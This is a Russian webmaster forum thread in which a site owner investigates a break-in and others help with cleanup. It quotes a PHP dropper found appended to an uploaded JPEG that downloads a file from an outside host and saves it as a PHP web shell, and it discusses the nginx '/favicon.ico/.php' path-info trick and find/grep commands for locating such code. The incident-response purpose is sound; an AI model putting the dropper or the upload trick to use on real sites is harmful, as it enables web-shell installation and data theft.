- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
При это к картинке foto_107953.jpg дописан код:
Цитата:
<?php^M
$file = file_get_contents('http://lbest-vrn.ru/6666.txt');^M
$brd = fopen('1234567.php','w+');^M
$write = fwrite($brd, $file);^M
?>
Размеры ответа, возможно, зависели от ошибок выдаваемых php.
В файле foto_107953.jpg другой мини-шелл, который скачивает и создает уже php-файл 1234567.php. Может быть таким образом скрипт для дампа базы закачали для большего удобства если предыдущий шелл чем-то не устроил.
а этот файл проверили? лучше даже во всех картинках сразу код поискать.
Вот засунули вы папку upload в специальный location, но /favicon.ico/.php ведь им не покрывается?
Стоит разобраться почему cgi.fix_pathinfo = 0 не помог.
Проверьте, например с помощью функции phpinfo() из обычного скрипта действительно ли эта настройка отключается. Может быть php.ini используется не тот, который вы правили или что-то еще нужно перезапустить.
а этот файл проверили?
Да, в нем все чисто. Очевидно favicon.ico используют чисто для идентификации уязвимости. Это выгодно делать, потому что такая картинка есть практически на любом сайте.
лучше даже во всех картинках сразу код поискать.
а как это сделать, если их десятки тысяч аватарок?
Проверьте, например с помощью функции phpinfo() из обычного скрипта действительно ли эта настройка отключается.
Отключается, но не помогает.
а как это сделать, если их десятки тысяч аватарок?
ну у вас же наверняка там mc есть. там в меню есть поиск по содержимому файлов.
в первом приближении, как-то так :
find . -type f |xargs grep '<?php'
но этот код не найдет скрипты которые, начинаются с символов <?
find . -type f |xargs grep '<?php'
Спасибо за команду, сейчас пройдусь.